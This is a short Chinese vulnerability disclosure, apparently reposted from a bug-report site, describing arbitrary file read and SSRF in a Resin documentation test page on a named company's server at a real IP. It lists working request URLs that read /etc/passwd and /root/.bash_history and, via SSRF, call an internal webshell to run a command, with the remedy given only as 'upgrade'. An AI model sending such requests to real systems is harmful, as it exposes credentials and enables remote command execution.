空中网某站点任意文件读取/SSRF导致Getshell
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history
内部服务器用户名密码泄露
ssrf
可探测内网
探测到内网shell内删除
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=https://192.168.11.33:8080/shell/shell.jsp?cmd=ifconfig
漏洞证明:
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history
内部服务器用户名密码泄露
ssrf
可探测内网
探测到内网shell内删除
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=https://192.168.11.33:8080/shell/shell.jsp?cmd=ifconfig
解决方案:
升级版本
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/100420.html